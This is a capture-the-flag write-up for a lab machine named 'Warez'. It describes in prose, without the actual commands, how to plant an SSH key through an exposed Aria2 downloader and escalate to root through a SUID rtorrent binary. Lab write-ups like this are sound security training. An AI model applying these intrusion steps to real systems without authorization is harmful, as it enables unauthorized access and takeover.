Warez
When starting the machine, it shows us its IP address; in this case, it is 192.168.18.190.
To begin, we will perform a scan using the NMAP tool, which will help us identify open ports on the target machine. First, we will use the following command for a quick scan that informs us about the open ports. We will scan all ports (65535) without depth.
And now, with the open ports we have identified, we will perform a more in-depth scan:
We observe that port 6800 is running Aria2, which is an open-source downloader that supports various protocols such as HTTP, FTP, BitTorrent.
Upon entering through port 80, we obtain the username carolina.
The next thing we notice is that by entering "Add" in "By URLs", we see that we can upload files to any directory. So, I'm going to copy my id_rsa.pub to a file called authorized_keys and upload it, allowing the victim machine to recognize our machine as an authorized one, in this case, under the user carolina.
If you don't have the id_rsa.pub file, you can create it with the following command:
And with Python, we start a web server on port 8080:
Now, we put the URL where our file is located and change the destination directory to /home/carolina/.ssh:
We send the command, and now we can access via port 22 (SSH) as the user carolina.
Let's check how many users are on the machine. It appears that there are only two users: carolina and root.
Additionally, we can obtain the user flag. Time for privilege escalation.
We enumerate the SUID binaries on the machine, and there is one that we can use to escalate to root very easily. The relevant binary is rtorrent:
We search in GTFObins, and it provides a way to escalate to root using this SUID binary by running the following command:
And now we are root. Let's obtain the root flag, and we're done. Machine completed!
Last updated
